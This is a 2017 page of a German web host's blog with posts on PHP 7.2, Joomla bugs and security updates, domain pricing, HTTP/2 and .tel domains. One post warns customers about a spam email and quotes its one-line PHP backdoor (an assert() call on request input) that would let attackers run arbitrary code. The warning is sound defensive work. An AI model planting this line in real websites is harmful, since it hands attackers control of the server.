Das Variomedia-Blog | Seite 10 | Hier schreiben die Variomedianer!

1. September 2017

PHP 7.2 RC1 verfügbar

Ab sofort steht auf unseren Webservern der erste Release Candidate der neuen PHP-Version 7.2 zu Testzwecken zur Verfügung. Bitte beachten Sie, dass es sich dabei um eine Vorabversion handelt, die noch einige Fehler enthalten kann, sie sollte daher nicht für den Produktiveinsatz genutzt werden. Die endgültige und für den Produktiveinsatz freigegebene Version von PHP 7.2 erscheint voraussichtlich gegen Ende November dieses Jahres.

Änderungen zur Vorgängerversion 7.1

Grundsätzlich fallen die Änderungen an bestehenden Funktionen im Vergleich zur Vorgängerversion PHP 7.1 geringfügig aus, so dass die meisten aktuellen PHP-Anwendungen auch unter PHP 7.2 lauffähig sind. Eine Übersicht über alle Änderungen finden Sie hier.

Wir konnten in ersten Tests einen kleinen Geschwindigkeitsvorteil von bis zu 10% zugunsten der neuen PHP-Version feststellen.

Eine wichtige Änderung ist die Entfernung der veralteten Verschlüsselungs-Extension Mcrypt, statt dessen sollte die neu hinzugefügte Extension Sodium genutzt werden.

PHP 7.2 aktivieren

Sie können PHP 7.2 wie üblich per .htaccess-Datei mittels folgender Direktive aktivieren:
AddHandler application/x-httpd-php72 .php
Die Aktivierung über das Kundenmenü wird erst möglich sein, sobald die finale Version von PHP 7.2 offiziell veröffentlicht wird.

16. August 201722. August 2017

Probleme bei der Installation von Joomla

Aufgrund eines Programmierfehlers im Installer der aktuellen Joomla-Version 3.7.4 lässt sich diese nicht auf unseren Webservern installieren. Die Fortschrittsanzeige bei der Installation bleibt bei etwa 10% stehen, dann passiert nichts mehr.

Der Fehler ist den Joomla-Entwicklern bekannt und wird in der nächsten Joomla-Version behoben. Bitte nutzen Sie für eine Neuinstallation von Joomla bis dahin die Vorgängerversion 3.7.3 und nehmen dann ein Update auf die aktuelle Joomla-Version vor.

Update

Der Fehler wurde in der neuen Joomla Version 3.7.5 behoben.

7. August 2017

Gefährlicher Spam an Inhaber von .ru-Domains

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

31. Juli 2017

Aktualisierung zur angekündigten Preiserhöhung am 8.9.2017

Wie bereits im März angekündigt, erhöht die Registrierungstelle Uniregistry ab dem 8.9.2017 die Preise für einige ihrer Top-Level-Domains deutlich. Die Ankündigung der Erhöhung hat Uniregistry viel Kritik eingebracht. Kurz vor Inkrafttreten der Preiserhöhung gibt es nun zumindest eine kleine Abschwächung der Preiserhöhung. Die Änderung umfasst zwei Punkte:

Bei einigen TLDs bleiben die Preise für bereits registrierte Domains unverändert, sie werden nur für neue Domains erhöht. Dazu zählen folgende TLDs: .audio, .blackfriday, .diet, .flowers, .guitars, .hiphop, .property, .hosting, .juegos
Bei anderen TLDs werden die Preise für bestehende Domains – im Verhältnis zum hohen Neuregistrierungspreis – nur gering erhöht. Dies betrifft folgende TLDs: .click, .link, .help, .pics, .sexy, .tattoo, .christmas. Bei .click- und .link-Domains ist die Preiserhöhung so gering, dass wir auf eine Weitergabe des höheren Preises verzichten.

Nach wie vor gilt das Angebot, bestehende Domains noch vor der Preiserhöhung um bis zu 10 Jahre zu verlängern – in diesem Fall gilt der aktuelle Preis für die gesamte Laufzeit, wird allerdings auch sofort abgerechnet. Wir informieren alle Kunden, die von der Preiserhöhung betroffen sind, in den nächsten Tagen noch persönlich per E-Mail.

Die folgende Tabelle zeigt zusammenfassend alle betroffenen Top-Level-Domains, die Preise für Registrierungen / Verlängerungen vor dem 8.9. und die Preise für Registrierungen nach der Preiserhöhung.

	Preis bis 7.9.2017	Preis ab 8.9.2017 für bestehende Domains	Preis ab 8.9.2017 für neue Domains
.help	24,- Euro	39,- Euro	39,- Euro
.pics	21,- Euro	39,- Euro	39,- Euro
.sexy	21,- Euro	39,- Euro	39,- Euro
.christmas	33,- Euro	51,- Euro	51,- Euro
.tattoo	33,- Euro	51,- Euro	51,- Euro
.audio	24,- Euro	24,- Euro	150,- Euro
.blackfriday	33,- Euro	33,- Euro	150,- Euro
.diet	24,- Euro	24,- Euro	150,- Euro
.flowers	33,- Euro	33,- Euro	150,- Euro
.guitars	33,- Euro	33,- Euro	150,- Euro
.hiphop	21,- Euro	21,- Euro	150,- Euro
.property	33,- Euro	33,- Euro	150,- Euro
.hosting	33,- Euro	33,- Euro	450,- Euro
.juegos	24,- Euro	24,- Euro	450,- Euro

Alle Preise in Euro pro Jahr inkl. 19% Mehrwertsteuer.

21. Juli 201721. Juli 2017

Aktion bis zum 31.7.2017: Bis zu 90% Rabatt auf ausgewählte TLDs

Noch bis zum 31. Juli bieten wir ingesamt 18 Top-Level-Domains mit Rabatten bis zu 90% im ersten Jahr (Neuregistrierung) an:

TLD	Normalpreis (pro Jahr)	Aktionspreis im ersten Jahr
.email	18,- Euro	6,- Euro
.city	21,- Euro	6,- Euro
.business	21,- Euro	6,- Euro
.fail	24,- Euro	6,- Euro
.gold	99,- Euro	6,- Euro
.credit	99,- Euro	6,- Euro
.jetzt	21,- Euro	12,- Euro
.schule	21,- Euro	12,- Euro
.events	27,- Euro	12,- Euro
.reisen	33,- Euro	12,- Euro
.gmbh	33,- Euro	12,- Euro
.immo	39,- Euro	12,- Euro
.shopping	39,- Euro	12,- Euro
.marketing	42,- Euro	12,- Euro
.guru	42,- Euro	12,- Euro
.media	42,- Euro	12,- Euro
.restaurant	57,- Euro	12,- Euro
.reise	111,- Euro	12,- Euro

Alle Preise enthalten 19% Mehrwertsteuer. Der Aktionspreis gilt für Neuregistrierungen bis zum 31.7.2017 (Mitternacht). Ausgenommen sind Domains, die die jeweilige Registrierungsstelle als Premiumdomains deklariert hat; diese werden zum jeweiligen Premiumpreis abgerechnet.

Die Vertragslaufzeit bei allen Domains beträgt 1 Jahr mit einer Kündigungsfrist von vier Wochen zum Ende der Vertragslaufzeit.

Neukunden können die gewünschten Domains über unsere Webseite bestellen. Bestandskunden können die gewünschten Domains im Kundenmenü auf Verfügbarkeit prüfen und zur Registrierung beauftragen.

21. Juli 2017

.asia-Domains jetzt ohne Treuhandservice

Ab sofort ist die Registrierung von .asia-Domains auch ohne einen Wohn- oder Firmensitz in Asien möglich. Die Registrierungsstelle hat die Vergabebedingungen für .asia-Domains entsprechend geändert.

Um unseren Kunden in Europa die Registrierung von .asia-Domains zu ermöglichen, haben wir bisher mit einem Anwalt in Japan zusammengearbeitet. Er agierte treuhänderisch als Admin-C für alle bei uns registrierten .asia-Domains. Nach der Freigabe durch die Registrierungsstelle ist dies nun nicht mehr erforderlich. Alle bestehenden .asia-Domains werden in Kürze automatisch durch uns aktualisiert.

Wir bieten .asia-Domains für 24,- Euro pro Jahr an. Reseller erhalten (je nach Gesamtbestand ihrer Domains) einen Rabatt bis zu 15% auf den Jahrespreis. Der Treuhandservice wurde von uns bisher kostenlos zur Verfügung gestellt.

6. Juli 20177. Juli 2017

HTTP/2 auf unseren Webservern verfügbar

Unsere Webserver unterstützen ab sofort HTTP/2. Dabei handelt es sich um eine verbesserte Version des HTTP-Protokolls, mit dem Webseiten von unseren Webservern zu Ihrem Browser übertragen werden. HTTP/2 basiert auf dem von Google entwickelten SPDY-Protokoll, dessen Weiterentwicklung zugunsten von HTTP/2 eingestellt wurde.

Vorteile von HTTP/2

Die wichtigste Neuerung in HTTP/2 ist, dass nun mehrere Elemente einer Webseite gleichzeitig über eine einzige Verbindung übertragen werden können (Multiplex). Zuvor war für jedes einzelne Element einer Webseite eine eigene Verbindung erforderlich, deren Aufbau durch Netzwerklatenzen immer einige Zeit in Anspruch nimmt. Bei Webseiten mit sehr vielen Elementen kann HTTP/2 daher zu einer Verbesserung der Ladezeit führen. Auch bei Mobilfunkverbindungen (z.B. EDGE, UMTS, LTE) kann HTTP/2 die Ladezeit reduzieren, da die Netzwerklatenzen hier besonders hoch ausfallen.

Voraussetzungen für HTTP/2

HTTP/2 wird von praktisch allen aktuellen Web-Browsern unterstützt, es sind keine Anpassungen an Ihren Webseiten erforderlich. Browser ohne HTTP/2-Unterstützung nutzen automatisch die vorigen Protokollversionen HTTP/1.1 bzw. HTTP/1.0, die von unseren Webservern auch weiterhin unterstützt werden.

HTTP/2 kann jedoch nur bei verschlüsselten HTTPS-Verbindungen genutzt werden, für die ein gültiges SSL-Zertifikat benötigt wird. Ein solches SSL-Zertifikat ist in vielen unserer Hosting-Pakete bereits inklusive, zur Einrichtung von SSL-Zertifikaten für Ihre Webseiten wenden Sie sich bitte an unsere Kundenbetreuung.

Browser mit HTTP/2-Unterstützung

Apple Safari ab Version 9
Google Chrome ab Version 40
Microsoft Edge
Microsoft Internet Explorer ab Version 11
Mozilla Firefox ab Version 36

Update: Probleme mit Node.js

Durch die Aktivierung von HTTP/2 wurden von der Webserver-Software Apache automatisch HTTP-Upgrade-Header generiert, die zu Problemen mit älteren Node.js-Versionen geführt haben. Diese Header wurden nur bei verschlüsselten HTTPS-Verbindungen mit der alten Protokollversion HTTP/1.1 gesendet, und sollen die Unterstützung für HTTP/2 durch den Webserver bekanntgeben. Die Upgrade-Header sind jedoch nicht erforderlich, da wir HTTP/2 nur für verschlüsselte HTTPS-Verbindungen nutzen, und die Unterstützung für HTTP/2 in diesem Fall bereits bei der Aushandlung der Verschlüsselung mitgeteilt wird (ALPN). Wir haben diese problematischen HTTP-Header daher nun entfernt.

16. März 201716. März 2017

Wichtige Änderungen bei .tel-Domains

10 Jahre lang gab es bei .tel-Domains die Besonderheit, dass diese sich nicht für normale Webseiten nutzen ließen, sondern grundsätzlich auf ein Hosting-System der Registrierungsstelle verwiesen. Jeder Inhaber einer .tel-Domain konnte sich dort einloggen und Kontaktdaten von sich hinterlegen, sei es Anschriften, Telefonnummern, E-Mail-Adressen, Instant Messenger-Kontakte und vieles mehr. Diese Kontaktdaten wurden dann beim Aufruf der Domain angezeigt.

Mit dieser Methode war es einfach und schnell möglich, eine Art Visitenkarte anzulegen. Auch der E-Mail-Empfang war mit .tel-Domains möglich; dies jedoch nicht über das Hosting-System der Registrierungsstelle, sondern – in unserem Fall – über unsere Server.

Seit wenigen Tagen hat sich die Registrierungsstelle von diesem Modell gelöst und behandelt .tel-Domains wie alle anderen Domains auch, d.h. man kann auch eigene Webseiten unter einer .tel-Domain veröffentlichen. In diesem Zusammenhang wurde auch das alte Hosting-System durch eine neue Plattform ersetzt – leider ohne, dass die gespeicherten Kontaktdaten übernommen wurden.

Auch die Angabe unserer Mailserver wurde verworfen, was dazu führte, dass Inhaber einer .tel-Domain keine E-Mails mehr empfangen konnten.

Um den E-Mail-Empfang wieder zu gewährleisten, haben wir die betroffenen .tel-Domains so aktualisiert, dass anstelle der bisherigen Nameserver der Registrierungsstelle unsere Nameserver genutzt werden. Der E-Mail-Empfang war daraufhin wieder möglich und nicht zugestellte E-Mails wurden nachträglich zugestellt. Um das neue Hosting-System der Registrierungsstelle nutzen zu können, sind zwei bzw. drei Schritte erforderlich:

Erstellen Sie unter https://www.do.tel/signup/ einen Account für das neue System.
Beauftragen Sie uns, die Domain mit dem neuen Hosting-System der Registrierungsstelle zu verbinden.
Falls Sie E-Mails mit Ihrer .tel-Domain empfangen möchten, loggen Sie sich unter https://www.managemy.tel mit Ihrem neu erstellten Account ein, klicken Sie oben rechts auf “Settings” und dann auf “Setup .tel email”. Geben Sie hier im Feld “Order” eine “10” ein und bei Server host name “mail.variomedia.de”.

Bitte entschuldigen Sie die Unannehmlichkeiten, die durch die Umstellung auf das neue Hosting-System entstanden sind. Die neue Plattform bietet eine Vielzahl neuer Möglichkeiten und ist durchaus einen Blick wert. Ein einfaches Beispiel für eine .tel-Seite finden Sie hier: http://telpage.tel/.

13. März 2017

Preiserhöhung einiger TLDs von Uniregistry zum 8. September 2017

Die Registrierungsstelle Uniregistry hat zum 8. September 2017 massive Preiserhöhungen für einige der von ihr verwalteten Top-Level-Domains angekündigt. Die Preiserhöhungen sind so deutlich, dass wir sie ohne Einschränkungen an unsere Kunden weitergeben müssen. Folgende Preise ändern sich (pro Jahr, inkl. MwSt.):

	Preis bis 7.9.2017	Preis ab 8.9.2017
.audio	24,- €	150,- €
.blackfriday	33,- €	150,- €
.christmas	33,- €	87,- €
.diet	24,- €	150,- €
.flowers	33,- €	150,- €
.guitars	33,- €	150,- €
.help	24,- €	39,- €
.hiphop	21,- €	150,- €
.hosting	33,- €	450,- €
.juegos	24,- €	450,- €
.pics	21,- €	39,- €
.property	33,- €	150,- €
.sexy	21,- €	69,- €
.tattoo	33,- €	51,- €

Die Registrierungsstelle bietet Interessenten die Möglichkeit, bis zum 7.9.2017 registrierte Domains bereits jetzt um bis zu 10 Jahre verlängern. In diesem Fall gilt für diese Verlängerung noch der alte Preis. Sofern Sie diese Option nutzen möchten, kontaktieren Sie bitte unsere Kundenbetreuung.

7. März 2017

Angriffe auf veraltete Joomla-Installationen

Seit Beginn dieses Jahres beobachten wir zahlreiche Angriffe auf veraltete Joomla-Installationen auf unseren Webservern. Betroffen sind alle Joomla-Installationen, die noch nicht den aktuellen Versionszweig 3.6 nutzen. Sämtliche dieser älteren Versionen werden nicht mehr von den Joomla-Entwicklern unterstützt und weisen diverse kritische Sicherheitsprobleme auf, die nicht mehr durch Updates behoben werden. Angreifer können so beispielsweise Ihre Webseiten mit JavaScript-Schadcode versehen oder in Ihrem Namen Spam versenden. Bisherige Angriffe auf ältere Joomla-Installationen wurden meistens durch unsere Webserver-Firewall abgewehrt, doch in den aktuellen Fällen ist es den Angreifern gelungen, unsere Schutzmaßnahmen zu überwinden und so die Sicherheitslücken in Joomla auszunutzen.

Leider ist eine Aktualisierung älterer Joomla-Installationen sehr Aufwändig, häufig treten dabei auch Probleme auf. Falls Ihre Joomla-Installation nach einem Update nicht mehr funktioniert, können sie ein Backup vom Webspace und der MySQL-Datenbank einspielen.

Joomla 1.0 und 1.5 aktualisieren

Ein Update der Versionen 1.0 und 1.5 auf 3.6 ist leider nicht so einfach möglich, da beim Schritt vom Version 1.5 auf 1.6 diverse nicht abwärtskompatible Änderungen an Joomla vorgenommen wurden, so lassen sich etwa bestehende Templates nicht mehr weiter nutzen. In diesem Fall ist eine aufwändige Migration der alten Daten in eine neue Joomla-Installation mithilfe von kostenpflichtigen Extensions erforderlich. Aufgrund der Vielzahl an möglichen Problemen bei der Migration empfiehlt es sich, einen spezialisierten Joomla-Dienstleister mit dem Update zu beauftragen. Aufgrund des hohen Aufwandes kann es in vielen Fällen sinnvoller sein, eine neue Webseite mit der aktuellen Joomla-Version oder einem anderen Content-Management-System wie WordPress aufzusetzen.

Falls Sie trotz der möglichen Probleme ein Update von Joomla 1.5 selbst vornehmen möchten, empfehlen wir, zunächst eine Neuinstallation von Joomla in Version 2.5 vorzunehmen, und die Daten aus der alten Joomla-Installation dann mittels der kostenlosen Extension redMigrator in die neue Installation zu importieren (der Zwischenschritt auf Joomla 2.5 ist notwendig, da die Extension unter neueren Joomla-Versionen nicht mehr funktioniert). Abschließend können Sie die neue Joomla-Installation dann wie oben beschrieben auf die aktuelle Version 3.6 aktualisieren.

Joomla 1.6 und neuer aktualisieren

Falls Sie Joomla in Version 1.6 nutzen, prüfen Sie zunächst, ob Ihre Joomla-Installation bereits auf die letzte Version 1.6.6 dieses Versionszweiges aktualisiert wurde. Falls nicht, laden Sie ein passendes Patch-Package herunter, entpacken es und kopieren die Inhalte dann per (S)FTP in das Joomla-Installationsverzeichnis auf Ihrem Webserver. Danach können Sie Joomla über das Backend wie im Folgenden beschrieben updaten:

Falls Sie Joomla Version 1.6.6 oder neuer nutzen, können Sie die Updates per Web-Browser über das Joomla-Backend vornehmen. Beachten Sie bitte, dass dabei unter Umständen Kompatibilitätsprobleme mit Templates und Zusatzkomponenten von Drittanbietern auftreten können, vor dem Update müssen daher alle nicht mit Joomla 3.6 kompatiblen Erweiterungen von Drittanbietern deinstalliert werden. Eine detaillierte Anleitung zum Update finden Sie hier. Das Update erfordert unter Umständen mehrere Zwischenschritte, bis die aktuelle Version 3.6 erreicht ist.

Aktuelle PHP-Version nutzen

Manche Sicherheitslücken in PHP-Anwendungen wie Joomla lassen sich nur im Zusammenspiel mit veralteten PHP-Versionen ausnutzen. Wir empfehlen daher, eine möglichst aktuelles PHP ab Version 5.6 einzusetzen. PHP-Versionen älter als 5.6 sollten nur bei Kompatibilitätsproblemen genutzt werden. Eine Anleitung zur Auswahl einer PHP-Version finden Sie hier.

Sicherheits-Hotfixes für alte Joomla-Versionen

Falls ein sofortiges Update Ihrer Joomla-Installation nicht möglich ist, sollten Sie wenigstens die von den Joomla-Entwicklern empfohlenen Sicherheits-Hotfixes installieren.

Installation der Hotfixes für Joomla 2.5

Prüfen Sie zunächst, ob Ihre Joomla-Installation bereits auf die letzte Joomla 2.5 Version 2.5.28 aktualisiert wurde. Falls nicht, melden Sie sich als Administrator im Joomla-Backend an und nehmen dort unter “Joomla!-Aktualisierung” ein Update vor. Anschließend installieren sie die beiden Sicherheits-Hotfixes wie folgt:

Die Datei Joomla2.5.28-20161214PATCH.zip wird über den Joomla Extension Manager als Update-Paket installiert. Nach der Installation erfolgt automatisch ein Logout, es gibt keine weitere Rückmeldung, ob die Installation erfolgreich war.
Die Datei SessionHardening25v1.zip enthält aktualisierte Versionen der Dateien libraries/joomla/session/session.php und plugins/system/debug/debug.php. Entpacken Sie die ZIP-Datei auf Ihrem Rechner und übertragen Sie die entpackten Verzeichnisse dann per (S)FTP in die entsprechenden Verzeichnisse Ihrer Joomla-Installation auf dem Webserver.

Installation der Hotfixes für Joomla 1.5

Prüfen Sie zunächst, ob Ihre Joomla-Installation bereits auf die letzte Joomla 1.5 Version 1.5.26 aktualisiert wurde. Falls nicht, laden Sie ein passendes Patch-Package herunter, entpacken es und kopieren die Inhalte dann per (S)FTP in das Joomla-Installationsverzeichnis auf Ihrem Webserver. Anschließend installieren sie die beiden Sicherheits-Hotfixes wie folgt:

Die Datei UploadFix15v3.zip enthält aktualisierte Versionen der Dateien administrator/components/com_media/helpers/media.php und libraries/joomla/filesystem/file.php. Entpacken Sie die ZIP-Datei auf Ihrem Rechner und übertragen die entpackten Verzeichnisse dann per (S)FTP in das Hauptverzeichnis Ihrer Joomla-Installation auf dem Webserver.
Die Datei SessionFix15v2.zip enthält aktualisierte Versionen der Dateien libraries/joomla/session/session.php und plugins/system/debug/debug.php. Entpacken Sie die ZIP-Datei auf Ihrem Rechner und übertragen die entpackten Verzeichnisse dann per (S)FTP in das Hauptverzeichnis Ihrer Joomla-Installation auf dem Webserver.